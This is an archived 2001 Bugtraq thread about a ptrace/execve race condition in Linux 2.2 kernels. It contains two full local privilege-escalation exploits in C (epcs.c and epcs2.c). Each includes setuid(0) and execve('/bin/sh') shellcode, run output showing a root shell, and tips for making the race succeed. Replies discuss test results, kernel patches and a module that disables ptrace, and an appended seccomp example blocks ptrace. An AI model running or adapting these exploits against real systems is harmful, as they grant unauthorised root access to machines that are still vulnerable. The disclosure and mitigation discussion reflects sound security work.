6278842 2001-03-27 14:05 +0200  /45 lines/ Wojciech Purczynski <wp@ELZABSOFT.PL>
Sent by: joel@lysator.liu.se
Imported: 2001-03-27  17:55  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: wp@ELZABSOFT.PL
Recipient: Bugtraq (import) <16154>
Subject: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------

Hi,

Here is an exploit for the ptrace/execve race condition bug in Linux kernels
up to 2.2.18.

It works even on openwall patched kernels (including the broken fix in
2.2.18ow4) if you use the address of the BSS section in memory (use objdump
-h /suid/binary to get the .bss section address).

It does not use brute-force! It makes only one attempt; the parent process
detects the exact moment of the context switch after the child goes to sleep
in execve.

If you have problems, ensure that the suid binary you want to sploit
is not in the disk cache.

For more info read comments in the source code.

It has been broken in two places.

Sample output:

[wp@wp /tmp]$ uname -a
Linux wp.local.elzabsoft.pl 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686
unknown
[wp@wp /tmp]$ objdump -h /bin/su | grep .bss
  8 .rel.bss      00000030  08048ca8  08048ca8  00000ca8  2**2
 21 .bss          000000d4  0804bf04  0804bf04  00002f04  2**2
[wp@wp /tmp]$ find / >dev/null 2>&1
[wp@wp /tmp]$ ./epcs /bin/su 0x0804bf04
Bug exploited successfully.
sh-2.03#

It works with any suid binary.

Cheers,
wp

+---------------------------------------------------------+
| Wojciech Purczyński                 Linux Administrator |
| wp@elzabsoft.pl             http://www.elzabsoft.pl/~wp |
| +48604432981        http://www.elzabsoft.pl/~wp/gpg.asc |
+---------------------------------------------------------+
(6278842) /Wojciech Purczynski <wp@ELZABSOFT.PL>/(Re-wrapped)
Attachment (text/plain) in text 6278843
6278843 2001-03-27 14:05 +0200  /175 lines/ Wojciech Purczynski <wp@ELZABSOFT.PL>
Attachment filename: "epcs.c"
Imported: 2001-03-27  17:55  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: wp@ELZABSOFT.PL
Recipient: Bugtraq (import) <16155>
Attachment (text/plain) to text 6278842
Subject: Attachment (epcs.c) to: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
/*
 * epcs v2
 * ~~~~~~~
 * exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
 *
 * (c) 2001 Wojciech Purczynski / cliph / <wp@elzabsoft.pl>
 *
 * This sploit does _not_ use brute force. It does not need that.
 * It makes only one attempt to sploit the race condition in execve.
 * The parent process waits for the context switch that occurs after
 * the child task sleeps in execve.
 *
 * It should work even on openwall-patched kernels (I haven't tested it).
 *
 * Compile it:
 *	cc epcs.c -o epcs
 * Usage:
 *	./epcs [victim] [address]
 *
 * It gives instant root shell with any of a suid binaries.
 *
 * If it does not work, try some method of ensuring that execve
 * will sleep while loading the binary file into memory,
 *
 * 	e.g.: cat /usr/lib/* >/dev/null 2>&1
 *
 * Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
 * This exploit does not work on 2.4.x because kernel won't set suid 
 * privileges if user ptraces a binary.
 * But it is still exploitable on these kernels.
 *
 * Thanks to Bulba (he made me to take a look at this bug ;) )
 * Greetings to SigSegv team.
 *
 */

#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <signal.h>
#include <linux/user.h>
#include <sys/wait.h>
#include <limits.h>
#include <errno.h>
#include <stdlib.h>

#define CS_SIGNAL SIGUSR1
#define VICTIM "/usr/bin/passwd"
#define SHELL "/bin/sh"
#define SHELL_LEN "\x07"		/* strlen(SHELL) in hex */
#define SHELLCODE 0x00000000		/* address to put shellcode at */

/*
 * This is my private shellcode.
 * Offset 0x0a - executable's filename length.
 */
char shellcode[1024]=
	"\xeb\xfe"
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"		/* setuid(0) */
	"\x31\xc0\xb0\x2e\xcd\x80"
	"\x31\xc0\x50\xeb\x17\x8b\x1c\x24"		/* execve(SHELL) */
	"\x88\x43" SHELL_LEN "\x89\xe1\x8d\x54\x24"
	"\x04\xb0\x0b\xcd\x80\x31\xc0\x89"
	"\xc3\x40\xcd\x80\xe8\xe4\xff\xff"
	"\xff" SHELL ;

volatile int cs_detector=0;

void cs_sig_handler(int sig)
{
	cs_detector=1;
}

void do_victim(char * filename)
{
	while (!cs_detector) ;
	kill(getppid(), CS_SIGNAL);
	execl(filename, filename, NULL);
	perror("execl");
	exit(-1);
}

int check_execve(pid_t victim, char * filename)
{
	char path[PATH_MAX+1];
	char link[PATH_MAX+1];
	int res;
	
	snprintf(path, sizeof(path), "/proc/%i/exe", (int)victim);
	if (readlink(path, link, sizeof(link)-1)<0) {
		perror("readlink");
		return -1;
	}
	
	link[sizeof(link)-1]='\0';
	res=!strcmp(link, filename);
	if (res) fprintf(stderr, "Child slept outside of execve\n");
	return res;
}

int main(int argc, char * argv[])
{
	char * filename=VICTIM;
	pid_t victim;
	int error, i;
	unsigned long eip=SHELLCODE;
	struct user_regs_struct regs;

	if (argc>1) filename=argv[1];
	if (argc>2) eip=strtoul(argv[2], NULL, 16);

	signal(CS_SIGNAL, cs_sig_handler);

	victim=fork();
	if (victim<0) {
		perror("fork: victim");
		exit(-1);
	}
	if (victim==0) do_victim(filename);

	kill(victim, CS_SIGNAL);
	while (!cs_detector) ;
	
	if (ptrace(PTRACE_ATTACH, victim)) {
		perror("ptrace: PTRACE_ATTACH");
		goto exit;
	}
	
	if (check_execve(victim, filename))
		goto exit;

	(void)waitpid(victim, NULL, WUNTRACED);
	if (ptrace(PTRACE_CONT, victim, 0, 0)) {
		perror("ptrace: PTRACE_CONT");
		goto exit;
	}

	(void)waitpid(victim, NULL, WUNTRACED);
	
	if (ptrace(PTRACE_GETREGS, victim, 0, &regs)) {
		perror("ptrace: PTRACE_GETREGS");
		goto exit;
	}

	regs.eip=eip;
	
	for (i=0; i<strlen(shellcode); i+=4) {
		if (ptrace(PTRACE_POKEDATA, victim, regs.eip+i,
						    *(int*)(shellcode+i))) {
			perror("ptrace: PTRACE_POKETEXT");
			goto exit;
		}
	}

	if (ptrace(PTRACE_GETREGS, victim, 0, &regs)) {
		perror("ptrace: PTRACE_GETREGS");
		goto exit;
	}

	fprintf(stderr, "Bug exploited successfully.\n");
	
	if (ptrace(PTRACE_DETACH, victim, 0, 0)) {
		perror("ptrace: PTRACE_DETACH");
		goto exit;
	}

	(void)waitpid(victim, NULL, 0);
	return 0;
	
exit:
	fprintf(stderr, "Error!\n");
	kill(victim, SIGKILL);
	return -1;
}
(6278843) /Wojciech Purczynski <wp@ELZABSOFT.PL>/---
Comment in text 6278984 by Jerker Nyberg
6280381 2001-03-27 20:37 +0200  /77 lines/ Wouter de Jong <wouter@WIDEXS.NL>
Sent by: joel@lysator.liu.se
Imported: 2001-03-28  06:56  by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: wouter@WIDEXS.NL
Recipient: Bugtraq (import) <16180>
Comment on text 6278842 by Wojciech Purczynski <wp@ELZABSOFT.PL>
Subject: Re: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
From: Wouter de Jong <wouter@WIDEXS.NL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010327203749.A3131@widexs.nl>

On Tue, Mar 27, 2001 at 02:05:54PM +0200, Wojciech Purczynski wrote:
>
> Hi,

Hi,

> Here is an exploit for the ptrace/execve race condition bug in Linux kernels up
> to 2.2.18.
>
> It works even on openwall patched kernels (including the broken fix in 2.2.18ow4)
> if you use the address of the BSS section in memory (use objdump -h /suid/binary
> to get the .bss section address).
>
> It does not use brute-force! It makes only one attempt; the parent process detects
> the exact moment of the context switch after the child goes to sleep in execve.
>
> If you have problems, ensure that the suid binary you want to sploit is
> not in the disk cache.
>
> For more info read comments in the source code.
>
> It has been broken in two places.

<cut sample>

> It works with any suid binary.

I've tried this on several hosts, all with 2.2.18 (not all ow4)
(RedHat 6.2 + Slackware 7.1), and they gave me either the following
result:

ptrace: PTRACE_ATTACH: Operation not permitted
Error!


Or:

[wouter@nivedita wouter]$ uname -a
Linux nivedita 2.2.18 #1 Tue Feb 13 20:26:05 CET 2001 i686 unknown
[wouter@nivedita wouter]$ objdump -h /bin/su | grep .bss
  8 .rel.bss      00000030  08048ca8  08048ca8  00000ca8  2**2
 21 .bss          000000d4  0804bf04  0804bf04  00002f04  2**2
[wouter@nivedita wouter]$ find / >/dev/null 2>&1;~/epcs /bin/su 0804bf04
Bug exploited successfully.
Password:

If I use, for example, 08048ca8, I get this:

[wouter@nivedita wouter]$ find / >/dev/null 2>&1;~/epcs /bin/su 08048ca8
Bug exploited successfully.
[wouter@nivedita wouter]$ id
uid=519(wouter) gid=519(wouter) groups=519(wouter)

> Cheers,
> wp
>
> +---------------------------------------------------------+
> | Wojciech Purczynski                 Linux Administrator |
> | wp@elzabsoft.pl             http://www.elzabsoft.pl/~wp |
> | +48604432981        http://www.elzabsoft.pl/~wp/gpg.asc |
> +---------------------------------------------------------+


--
Met vriendelijke groet/With kind regards,

Wouter de Jong
System-Administrator/Developer
   __   _
  / /  (_)__  __ ____  __
 / /__/ / _ \/ // /\ \/ /
/____/_/_//_/\_._/ /_/\_\
(6280381) /Wouter de Jong <wouter@WIDEXS.NL>/(Re-wrapped)
6280411 2001-03-28 08:27 +0400  /40 lines/ Solar Designer <solar@OPENWALL.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-03-28  07:44  by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: solar@OPENWALL.COM
Recipient: Bugtraq (import) <16182>
Comment on text 6278842 by Wojciech Purczynski <wp@ELZABSOFT.PL>
Subject: Re: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
From: Solar Designer <solar@OPENWALL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010328082715.A471@openwall.com>

On Tue, Mar 27, 2001 at 02:05:54PM +0200, Wojciech Purczynski wrote:

Hi,

> Here is exploit for ptrace/execve race condition bug in Linux kernels up
> to 2.2.18.

Thanks for not releasing this before Linux 2.2.19 is out.  It would
be even better if you delayed this until the vendor updates are ready
(should be very soon) like I was planning to.

> It works even on openwall patched kernels (including broken fix in 2.2.18ow4)

Yes, the fix in 2.2.18-ow4 and 2.0.39-ow2 is insufficient -- it only
reduced the window without completely fixing the race.

I'd like to thank Rafal Wojtczuk for discovering the problem with my
original fix almost immediately after its release and reporting it to
me and the affected vendors privately.  Unfortunately, Linux 2.2.19
and the vendor updates couldn't be released until now for other valid
reasons(*) so I had to decide against releasing a 2.2.18-ow5, submit
the correct fix for 2.2.19 and wait until it's released.

Linux 2.2.19 is out.  I've released the 2.2.19-ow1 and 2.0.39-ow3
patches yesterday:

	http://www.openwall.com/linux/

Please upgrade to one of these versions.

(*) To be explained here after the vendor updates are ready.

--
/sd
(6280411) /Solar Designer <solar@OPENWALL.COM>/-----
6280613 2001-03-28 01:32 +0200  /64 lines/ Mariusz Woloszyn <emsi@IPARTNERS.PL>
Sent by: joel@lysator.liu.se
Imported: 2001-03-28  09:14  by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: emsi@IPARTNERS.PL
Recipient: Bugtraq (import) <16190>
Subject: Re: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
On Tue, 27 Mar 2001, Wojciech Purczynski wrote:

>
> Hi,
>
> Here is exploit for ptrace/execve race condition bug in Linux kernels up
> to 2.2.18.
>

Hi!

I've seen a tool that works better than this, using a different
approach to the same bug; it exploits it on all platforms, giving instant
root without the need to cat garbage files to clear the disk cache!!!

Anyway: here is a fast way to fix the problem (but it introduces a new
one), a kernel module that disables the ptrace syscall.  It works for
2.0 and 2.2 kernels (I didn't test it under 2.4).  All you need to
do is:

emsi:~# gcc -c npt.c
emsi:~# insmod ./npt.o


And here is how it works:

[before installing module]
emsi:~/hack/ptrace> ./a.out /sbin/powerd
[*] Child exec...
[+] Waiting for disk sleep....  dunno why but that printf helps sometimes
;)
[OK]
[+] ATTACH: 0 : Success
[+] eip: 0x1109d0 -> 0x805a41b
[+] copy data from 0x805a3e0 to 0xbffff100
[...............]
[?] DETACH: 0 : Success
Status of 5342: R
bash#
[installing module]
bash# /sbin/insmod ./npt.o
bash# exit
emsi:~/hack/ptrace> ./a.out /sbin/reboot
[*] Child exec...
[+] Waiting for disk sleep....  dunno why but that printf helps sometimes
;)
[OK]
[--] ATTACH: Operation not permitted      <==== see this
Exiting...
emsi:~/hack/ptrace> Unknown id: ELF


It removes the possibility of tracing processes, but gives an instant shield
against hackers.


greets: nergal, Lam3rZ, teso brothers, nises, hert and others :)

--
Mariusz Wołoszyn
Internet Security Specialist, Internet Partners
(6280613) /Mariusz Woloszyn <emsi@IPARTNERS.PL>/(Re-wrapped)
Attachment (text/plain) in text 6280614
6280614 2001-03-28 01:32 +0200  /45 lines/ Mariusz Woloszyn <emsi@IPARTNERS.PL>
Attachment filename: "npt.c"
Imported: 2001-03-28  09:14  by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: emsi@IPARTNERS.PL
Recipient: Bugtraq (import) <16191>
Attachment (text/plain) to text 6280613
Subject: Attachment (npt.c) to: Re: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
/* no ptrace module
   fast prevention for kernel bug
   (c) 2001 a Lam3rZ odyssey
*/


#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/unistd.h>
#include <sys/syscall.h>

#ifndef KERNEL_VERSION
#define KERNEL_VERSION(a,b,c) ((a)*65536+(b)*256+(c))
#endif

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,2,0)
#include <asm/unistd.h>
#endif

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,2,14)
#include <bits/syscall.h>
#endif

extern void *sys_call_table[];

int (*orig_ptrace)(int, int, int, int);

int no_ptrace (int request, int pid, int addr, int data)
{
	return -1;	/* -1 == -EPERM: callers see "Operation not permitted" */
}


int init_module(void) {
	
	orig_ptrace = sys_call_table[__NR_ptrace];
	sys_call_table[__NR_ptrace]=no_ptrace;
	return 0;
}

void cleanup_module(void) {
	
	sys_call_table[__NR_ptrace]=orig_ptrace;
}
(6280614) /Mariusz Woloszyn <emsi@IPARTNERS.PL>/----
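The policy of npt.c above, as an added example that is not part of the thread: the same "ptrace returns EPERM" rule written as a seccomp-bpf filter for a current kernel, where it applies to the installing process and its descendants rather than system-wide, plus a probe that shows the effect. It assumes Linux seccomp headers on x86_64 or aarch64; the function names are mine.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/syscall.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

/* A filter must check the ABI before it trusts the syscall number, so the
 * example refuses to build for architectures it has no value for. */
#if defined(__x86_64__)
#  define NATIVE_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#  define NATIVE_ARCH AUDIT_ARCH_AARCH64
#else
#  error "add the AUDIT_ARCH_* value for this architecture"
#endif

/* Install a seccomp-bpf filter that answers ptrace(2) with EPERM, the result
 * npt.c produced by hooking sys_call_table.  Returns 0, or -errno on failure.
 * The filter is inherited across fork() and execve(). */
int install_no_ptrace_filter(void)
{
	struct sock_filter filter[] = {
		/* kill the process if the syscall ABI is not the one we built for */
		BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
		BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, NATIVE_ARCH, 1, 0),
		BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
		/* ptrace -> EPERM, every other syscall -> allowed */
		BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
		BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_ptrace, 0, 1),
		BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
		BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
	};
	struct sock_fprog prog = {
		.len = (unsigned short)(sizeof(filter) / sizeof(filter[0])),
		.filter = filter,
	};

	/* Required for an unprivileged caller.  Side effect: with no_new_privs set,
	 * execve() no longer grants set-uid privileges to this process tree. */
	if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
		return -errno;
	if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != 0)
		return -errno;
	return 0;
}

/* Probe with PTRACE_ATTACH on pid 0, which names no task: an unfiltered
 * kernel looks the pid up and answers ESRCH, while the filter answers EPERM
 * before the kernel sees the request.  Returns the resulting errno. */
int ptrace_probe_errno(void)
{
	errno = 0;
	if (ptrace(PTRACE_ATTACH, 0, NULL, NULL) == 0)
		return 0;
	return errno;
}

int main(void)
{
	printf("before filter: ptrace -> %s\n", strerror(ptrace_probe_errno()));
	int rc = install_no_ptrace_filter();
	if (rc != 0) {
		fprintf(stderr, "seccomp: %s\n", strerror(-rc));
		return 1;
	}
	printf("after filter:  ptrace -> %s\n", strerror(ptrace_probe_errno()));
	return 0;
}
```

Build with cc and run as an unprivileged user; the caveat raised later in the thread still applies, since the filter stops ptrace(2) but not other routes to a process's memory.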
6284089 2001-03-28 12:18 +0400  /18 lines/ Solar Designer <solar@OPENWALL.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-03-29  04:22  by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: solar@OPENWALL.COM
Recipient: Bugtraq (import) <16211>
Comment on text 6280613 by Mariusz Woloszyn <emsi@IPARTNERS.PL>
Subject: Re: ptrace/execve race condition exploit (non brute-force)
------------------------------------------------------------
From: Solar Designer <solar@OPENWALL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010328121856.A1539@openwall.com>

On Wed, Mar 28, 2001 at 01:32:15AM +0200, Mariusz Woloszyn wrote:
> Anyway: here is a fast way to fix the problem (but intoduces new one), the
> kernel module that disables ptrace syscall.

Don't forget that the race isn't only against ptrace.  There's
procfs.  Fortunately, get_task() in fs/proc/mem.c checks for
PF_PTRACED, so the worst ways of abuse via procfs are solved with
disabling ptrace.  But it is not so obvious what other attacks
remain possible.

--
/sd
(6284089) /Solar Designer <solar@OPENWALL.COM>/-----
6296937 2001-03-31 20:12 -0600  /18 lines/ Tim Yardley <yardley@UIUC.EDU>
Sent by: joel@lysator.liu.se
Imported: 2001-04-01  18:34  by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: yardley@UIUC.EDU
Recipient: Bugtraq (import) <16282>
Subject: .. ptrace improvement
------------------------------------------------------------
As always, there are always ways to improve things.  This version of
the exploit posted here previously overwrites the dl _start routine
and doesn't modify eip.  This will help on stack non-exec systems and
doesn't require you to calculate the bss offset.  I didn't test it,
but this should still work on a stackguard compiled program as well.

your mileage may vary, and this will still suffer from the disk cache
issue (speed becoming a paramount concern).  the recent post by "Ihq"
where his exploit created a big file, is one way to fill out the
cache so that the suid binary is not in the cache.  manual methods
are just as easy.

rsh, gpasswd, passwd, etc etc are all common choices for hitting.
anything will work.

more details lie within the code. enjoy.

/tmy
(6296937) /Tim Yardley <yardley@UIUC.EDU>/(Re-wrapped)
Attachment (text/plain) in text 6296938
Attachment (text/plain) in text 6296939
6296938 2001-03-31 20:12 -0600  /192 lines/ Tim Yardley <yardley@UIUC.EDU>
Attachment filename: "epcs2.c"
Imported: 2001-04-01  18:34  by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: yardley@UIUC.EDU
Recipient: Bugtraq (import) <16283>
Attachment (text/plain) to text 6296937
Subject: Attachment (epcs2.c) to: .. ptrace improvement
------------------------------------------------------------
/*
 * epcs2 (improved by lst [liquid@dqc.org])
 * ~~~~~~~
 * exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
 *
 * originally by:
 * (c) 2001 Wojciech Purczynski / cliph / <wp@elzabsoft.pl>
 *
 * improved by:
 * lst [liquid@dqc.org]
 *
 * This sploit does _not_ use brute force. It does not need that.
 * It makes only one attempt to sploit the race condition in execve.
 * The parent process waits for the context switch that occurs after
 * the child task sleeps in execve.
 *
 * It should work even on openwall-patched kernels (I haven't tested it).
 *
 * Compile it:
 *	cc epcs.c -o epcs
 * Usage:
 *	./epcs [victim]
 *
 * It gives instant root shell with any of a suid binaries.
 *
 * If it does not work, try some method of ensuring that execve
 * will sleep while loading the binary file into memory,
 *
 * 	e.g.: cat /usr/lib/* >/dev/null 2>&1
 *
 * Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
 * This exploit does not work on 2.4.x because kernel won't set suid 
 * privileges if user ptraces a binary.
 * But it is still exploitable on these kernels.
 *
 * Thanks to Bulba (he made me to take a look at this bug ;) )
 * Greetings to SigSegv team.
 *
 * -- d00t
 * improved by lst [liquid@dqc.org]
 * props to kevin for most of the work
 *
 * now works on stack non-exec systems with some neat trickery for the automated
 * method, i.e. no need to find the bss segment via objdump
 *
 * particularly it now rewrites the code instruction sets in the
 * dynamic linker _start segment and continues execution from there.
 *
 * an aside, due to the fact that the code self-modifies, it wouldn't work
 * quite correctly on a stack non-exec system without playing directly with
 * the bss segment (i.e. no regs.eip = regs.esp change).  this is much more
 * automated.  however, do note that the previous version did not trigger stack
 * non-exec warnings due to how it was operating.  note that the regs.eip = regs.esp
 * method will break on stack non-exec systems.
 *
 * as always.. enjoy.
 *
 */

#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <signal.h>
#include <linux/user.h>
#include <sys/wait.h>
#include <limits.h>
#include <errno.h>
#include <stdlib.h>

#define CS_SIGNAL SIGUSR1
#define VICTIM "/usr/bin/passwd"
#define SHELL "/bin/sh"

/*
 * modified simple shell code with some trickery (hand tweaks)
 */
char shellcode[]=
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"		/* setuid(0) */
	"\x31\xc0\xb0\x2e\xcd\x80"
	"\x31\xc0\x50\xeb\x17\x8b\x1c\x24"		/* execve(SHELL) */
	"\x90\x90\x90\x89\xe1\x8d\x54\x24"		/* lets be tricky */
	"\x04\xb0\x0b\xcd\x80\x31\xc0\x89"
	"\xc3\x40\xcd\x80\xe8\xe4\xff\xff"
	"\xff" SHELL "\x00\x00\x00" ;			/* pad me */

volatile int cs_detector=0;

void cs_sig_handler(int sig)
{
	cs_detector=1;
}

void do_victim(char * filename)
{
	while (!cs_detector) ;
	kill(getppid(), CS_SIGNAL);
	execl(filename, filename, NULL);
	perror("execl");
	exit(-1);
}

int check_execve(pid_t victim, char * filename)
{
	char path[PATH_MAX+1];
	char link[PATH_MAX+1];
	int res;
	
	snprintf(path, sizeof(path), "/proc/%i/exe", (int)victim);
	if (readlink(path, link, sizeof(link)-1)<0) {
		perror("readlink");
		return -1;
	}
	
	link[sizeof(link)-1]='\0';
	res=!strcmp(link, filename);
	if (res) fprintf(stderr, "child slept outside of execve\n");
	return res;
}

int main(int argc, char * argv[])
{
	char * filename=VICTIM;
	pid_t victim;
	int error, i;
	struct user_regs_struct regs;

	/* take our command args if you wanna play with other progs */
	if (argc>1) filename=argv[1];

	signal(CS_SIGNAL, cs_sig_handler);

	victim=fork();
	if (victim<0) {
		perror("fork: victim");
		exit(-1);
	}
	if (victim==0) do_victim(filename);

	kill(victim, CS_SIGNAL);
	while (!cs_detector) ;
	
	if (ptrace(PTRACE_ATTACH, victim)) {
		perror("ptrace: PTRACE_ATTACH");
		goto exit;
	}
	
	if (check_execve(victim, filename))
		goto exit;

	(void)waitpid(victim, NULL, WUNTRACED);
	if (ptrace(PTRACE_CONT, victim, 0, 0)) {
		perror("ptrace: PTRACE_CONT");
		goto exit;
	}

	(void)waitpid(victim, NULL, WUNTRACED);
	
	if (ptrace(PTRACE_GETREGS, victim, 0, &regs)) {
		perror("ptrace: PTRACE_GETREGS");
		goto exit;
	}

	/* make sure that last null is in there */
	for (i=0; i<=strlen(shellcode); i+=4) {
		if (ptrace(PTRACE_POKETEXT, victim, regs.eip+i,
						    *(int*)(shellcode+i))) {
			perror("ptrace: PTRACE_POKETEXT");
			goto exit;
		}
	}

	if (ptrace(PTRACE_SETREGS, victim, 0, &regs)) {
		perror("ptrace: PTRACE_SETREGS");
		goto exit;
	}

	fprintf(stderr, "bug exploited successfully.\nenjoy!\n");
	
	if (ptrace(PTRACE_DETACH, victim, 0, 0)) {
		perror("ptrace: PTRACE_DETACH");
		goto exit;
	}

	(void)waitpid(victim, NULL, 0);
	return 0;
	
exit:
	fprintf(stderr, "d0h! error!\n");
	kill(victim, SIGKILL);
	return -1;
}
(6296938) /Tim Yardley <yardley@UIUC.EDU>/----------
6296939 2001-03-31 20:12 -0600  /12 lines/ Tim Yardley <yardley@UIUC.EDU>
Imported: 2001-04-01  18:34  by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: yardley@UIUC.EDU
Recipient: Bugtraq (import) <16284>
Attachment (text/plain) to text 6296937
Subject: Attachment to: .. ptrace improvement
------------------------------------------------------------

-- Diving into infinity my consciousness expands in inverse
    proportion to my distance from singularity

+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- ---------------+
| Tim Yardley (yardley@uiuc.edu)
| http://www.students.uiuc.edu/~yardley/
+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- ---------------+
(6296939) /Tim Yardley <yardley@UIUC.EDU>/----------
6311760 2001-04-04 02:03 +0200  /27 lines/ Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>
Sent by: joel@lysator.liu.se
Imported: 2001-04-04  12:29  by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: kluka@DANKA.II.FMPH.UNIBA.SK
Recipient: Bugtraq (import) <16326>
Comment on text 6310169 by Viraj Alankar <valankar@IFXCORP.COM>
Subject: Re: .. ptrace improvement
------------------------------------------------------------
From: Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010404020322.A22288@danka.ii.fmph.uniba.sk>

On Mon, Apr 02, 2001 at 11:03:14AM -0400, Viraj Alankar wrote:
> On Sat, 31 Mar 2001, Tim Yardley wrote:
>
> > As always, there are always ways to improve things.  This version of the
> > exploit posted here previously overwrites the dl _start routine and doesnt
> > modify eip.  This will help on stack non-exec systems and doesnt require
> > you to calculate the bss offset.  I didn't test it, but this should still
> > work on a stackguard compiled program as well.
>
> This works on my RH 6.2 w/ 2.2.16-3. I see that Redhat released a 2.2.17
> RPM on 2/8/2001 with 'ptrace' as one of the keywords. Does anyone know if
> this RPM addresses the problem?

    No!  Although there is a file called linux-2.2.19-ptrace.patch in
kernel-2.2.17-14.src.rpm, the kernel from (at least)
kernel-2.2.17-14.i686.rpm IS vulnerable (tested using the improved
exploit).  Maybe recompilation from the .src.rpm is worth trying, but
I compiled 2.2.19 instead.  I submitted this to bugzilla several
minutes ago; I wonder what will happen...
--
						JK
(6311760) /Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>/(Re-wrapped)